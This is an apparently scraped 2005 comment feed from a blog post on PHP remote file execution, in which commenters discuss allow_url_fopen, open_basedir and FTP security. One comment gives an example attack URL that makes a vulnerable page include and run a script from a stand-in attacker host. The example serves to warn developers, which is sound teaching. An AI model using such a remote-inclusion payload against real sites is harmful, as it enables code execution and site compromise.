http://technosailor.disqus.com/enWed, 07 Sep 2005 18:21:52 -0000http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/#comment-1028691<p>Here's a simple example of why allow_url_fopen is a problem in the real world.&lt;br /&gt;<br>&lt;br /&gt;<br>I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:&lt;br /&gt;<br>&lt;br /&gt;<br>&lt;br /&gt;<br>&lt;br /&gt;<br>And then they run it with something like "<a href="http://www.example.com/index.php?page=page5.html" rel="nofollow noopener" target="_blank" title="http://www.example.com/index.php?page=page5.html">http://www.example.com/inde...</a>".&lt;br /&gt;<br>&lt;br /&gt;<br>All it takes is someone to come along and type "<a href="http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt" rel="nofollow noopener" target="_blank" title="http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt">http://www.example.com/inde...</a>", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.&lt;br /&gt;<br>&lt;br /&gt;<br>Moral: allow_url_fopen should *always* be off unless you need it.&lt;br /&gt;<br>&lt;br /&gt;<br>Rob</p>Robert MathewsWed, 07 Sep 2005 18:21:52 -0000http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/#comment-1028690<p>Hey Matt,&lt;br /&gt;<br>Checking $_SERVER[’DOCUMENT_ROOT’] will not work because that global variable will be set according to the page doing the including, not the remote file itself. And yes, FTP will be a topic. :)&lt;br /&gt;<br>&lt;br /&gt;<br>Leave a Comment</p>AaronThu, 03 Feb 2005 09:30:48 -0000http://technosailor.com/2005/02/02/lessons-in-web-security-php-and-remote-file-execution/#comment-1028689<p>Ah yes open_basedir(), figured you'd mention that. Nice idea to use file_exists to check a file before including it. I s'pose there's lot of stuff you could do, like checking the $_SERVER["DOCUMENT_ROOT"] or the HOSTNAME to check the file is coming from itself.&lt;br /&gt;<br>&lt;br /&gt;<br>Are you gonna do anything on FTP security? Not being much of a security buff myself, but thinking about it, were someone able to gain FTP access (don't know but with register_globals on, could you pass a system command through a $_GET equiv, or guest accounts/public_ftp etc.) then they could upload whatever they wanted and have away with your system.&lt;br /&gt;<br>&lt;br /&gt;<br>And you might want to mention for the more n00b programmers out there to give all includes a .php extension (and not a .inc, for example ;) :p).&lt;br /&gt;<br>&lt;br /&gt;<br>Matt</p>Matt ThorntonThu, 03 Feb 2005 08:43:14 -0000